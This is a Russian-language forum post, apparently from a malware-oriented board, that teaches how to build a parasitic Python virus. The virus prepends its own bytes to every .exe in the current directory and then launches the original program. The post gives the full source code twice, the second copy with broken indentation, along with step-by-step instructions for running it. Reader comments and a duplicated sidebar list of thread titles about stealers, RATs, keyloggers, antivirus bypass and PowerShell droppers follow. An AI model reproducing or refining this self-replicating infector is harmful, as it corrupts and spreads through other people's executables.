Creating a parasitic virus in Python: "When the code begins to take on a life of its own."

Nick26rus · Nov 2, 2024

Приветствую всех причастных! Сегодня мы рассмотрим структуру паразитического вируса, его основные функции и узнаем, как этот код можно запустить.
Установка Python

Перед началом работы убедитесь, что у вас установлен Python. Следуйте этим шагам:

Скачайте Python Перейдите на официальный сайт Python и выберите подходящую версию для своей ОС.

Установите Python Запустите установочный файл и отметьте опцию “Add Python to PATH” во время установки.

Проверьте установку: В командной строке или терминале введите:

Код:
python --version

Code
python --version
Если установка прошла успешно, вы увидите номер версии Python.

Классификация вирусов

Перед тем как приступить к кодированию, рассмотрим основные типы HLLx-вирусов (High Level Language x — метод размножения):

Оверрайтеры (HLLO): Простые вирусы, которые перезаписывают оригинальные файлы, уничтожая их.

Компаньоны (HLLC): Эти вирусы маскируются под оригинальные файлы, заменяя их копиями.

Паразиты (HLLP): Наиболее сложные вирусы, внедряющиеся в код жертвы и позволяющие программе жертвы продолжить работу.

Здесь мы сосредоточимся на HLLP-вирусах, которые внедряются в исполняемые файлы и запускают оригинальную программу после активации.

Код паразитического вируса
import sys
import os

virPath = os.path.split(sys.argv[0])
names = os.listdir('.')
fvir = open(sys.argv[0], 'rb')
virData = fvir.read(19456)

for name in names:
namePair = os.path.splitext(name)
if namePair[1] == '.exe' and name != virPath[1]:
os.rename(name, name + 'tmp')
fprog = open(name + 'tmp', 'rb')
progData = fprog.read()
fnew = open(name, 'wb')
fnew.write(virData + progData)
fnew.close()
fprog.close()
os.remove(name + 'tmp')

origProgData = fvir.read()
origProg = 'original_' + virPath[1]
forig = open(origProg, 'wb')
forig.write(origProgData)
fvir.close()
forig.close()
os.execl(origProg, '')

Python
import sys

import os







virPath = os.path.split(sys.argv[0])

names = os.listdir('.')

fvir = open(sys.argv[0], 'rb')

virData = fvir.read(19456)







for name in names:

    namePair = os.path.splitext(name)

if namePair[1] == '.exe' and name != virPath[1]:

os.rename(name, name + 'tmp')

fprog = open(name + 'tmp', 'rb')

        progData = fprog.read()

fnew = open(name, 'wb')

        fnew.write(virData + progData)

        fnew.close()

        fprog.close()

os.remove(name + 'tmp')







origProgData = fvir.read()

origProg = 'original_' + virPath[1]

forig = open(origProg, 'wb')

forig.write(origProgData)

fvir.close()

forig.close()

os.execl(origProg, '')
Объяснение работы кода

Импорт библиотек: Модули sys и os используются для взаимодействия с операционной системой и управления файлами.

Получение пути к вирусу: С помощью os.path.split(sys.argv[0]) программа определяет путь к своему исполняемому файлу и его имя.

Чтение вирусного кода: Открывается файл вируса в бинарном режиме, и читаются первые 19456 байт, которые сохраняются в переменной virData.

Программа перебирает все файлы в текущей директории.

Если файл имеет расширение .exe и не является вирусным, то:

Файл временно переименовывается с добавлением суффикса tmp.

Содержимое временного файла считывается, и создаётся новый файл: сначала записывается вирусный код, а затем данные из оригинального файла.

Временный файл удаляется.

Реализация вируса
Шаг 1: Создайте файл с кодом вируса
Откройте текстовый редактор (например, Notepad или IDE для Python).
Вставьте приведенный код и сохраните как parasite_virus.py.

Шаг 2: Создайте тестовый исполняемый файл
Создайте текстовый файл с текстом, например, “Это тестовый файл.”
Сохраните его с расширением .exe, например, test_program.exe. (Можно использовать pyinstaller для конвертации .py в .exe.)

Шаг 3: Запустите вирус
Поместите parasite_virus.py и test_program.exe в одну директорию.
Запустите вирус с командой:
python parasite_virus.py

Code
python parasite_virus.py
После запуска файл test_program.exe будет заражен.

Надеюсь, вам нравится такой формат. Поддержите, и я буду делать еще больше подобных статей!

TotalProgram · Nov 2, 2024

голос · Nov 2, 2024

Сегодня же утром было или делитнули?

K4V0 · Nov 2, 2024

что за кринж

поздняков · Nov 2, 2024

а как его убрать потом, у меня по квартире паразиты коричневые бегают, тут еще в компьютере

batRat · Nov 16, 2024

Прикольно только у меня не работает:

Traceback (most recent call last):
File "C:\Users\admin\PycharmProjects\worm\main.py", line 41, in <module>
os.execl(origProg, origProg) # Первый аргумент — путь к файлу, второй — имя файла
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "<frozen os>", line 577, in execl
OSError: [Errno 8] Exec format error

Nmz · Nov 19, 2024

с таким на пентагон можно идти уверенно

Towux · Dec 1, 2024

а почему именно 19456 байт?

RoboMusk · Dec 2, 2024

MOAR

Malware: distribution methods, types of attacks, etc.

How to make an infected PowerShell command that activates your virus

(Click Fix) PowerShell Code in Windows activation and not only: how IEX and IWR methods help hackers

SMS theft virus on Android - Description of the problem, Sample project

We bypass smartkrin, chrome Alert and antiviruses without SMS and loans

We create our signature of code in ten minutes

winlocker for android

Who fumbles how dangerous it is?

How to get a digital code signature?

We get a clean OXI Joiner without glues from the official site.

Making a non-existent BOTA (RAT nickname) for iOS

Spy software for android (up to 10th) Observer

Flipper Zero

Blank-Grabber

How to remove a styller without demolition of Windows?

How to make a working *** with sending to discord.

AI can generate malware that evades detection 88% of the time

How to access another person PC

Android Malware - VNC - AC Node

Gray screen at DCRAT REMOTE Desktop, what to do?

Android Malware - Seed Phrase ******* / OCR / - Source Code

Intezer is a powerful tool for finding hidden threats

Analysis of the old Red Petya virus and other families of this virus

Making a secure webhook for ******* tapping in tg

What miner can be pumped up to a person to drip my grandmas?

New virus gradually exciting Lolz

We put the Redline crack socket in 5 minutes

Multifunctional Android RAT with web panel, no ports.

Writing a styler in Java

Python keylogger: how to create simple monitoring with data protection

Creating a parasitic virus in Python: "When the code begins to take on a life of its own."

Malware: distribution methods, types of attacks, etc.

How to make an infected PowerShell command that activates your virus

(Click Fix) PowerShell Code in Windows activation and not only: how IEX and IWR methods help hackers

SMS theft virus on Android - Description of the problem, Sample project

We bypass smartkrin, chrome Alert and antiviruses without SMS and loans

We create our signature of code in ten minutes

winlocker for android

Who fumbles how dangerous it is?

How to get a digital code signature?

We get a clean OXI Joiner without glues from the official site.

Making a non-existent BOTA (RAT nickname) for iOS

Spy software for android (up to 10th) Observer

Flipper Zero

Blank-Grabber

How to remove a styller without demolition of Windows?

How to make a working ******* with sending **** to discord.

AI can generate malware that evades detection 88% of the time

How to access another person PC

Android Malware - VNC - AC Node

Gray screen at DCRAT REMOTE Desktop, what to do?

Android Malware - Seed Phrase ******* / OCR / - Source Code

Intezer is a powerful tool for finding hidden threats

Analysis of the old Red Petya virus and other families of this virus

Making a secure webhook for ******* tapping in tg

What miner can be pumped up to a person to drip my grandmas?

New virus gradually exciting Lolz

We put the Redline crack socket in 5 minutes

Multifunctional Android RAT with web panel, no ports.

Writing a styler in Java

Python keylogger: how to create simple monitoring with data protection

Creating a parasitic virus in Python: "When the code begins to take on a life of its own."

How to make a working *** with sending to discord.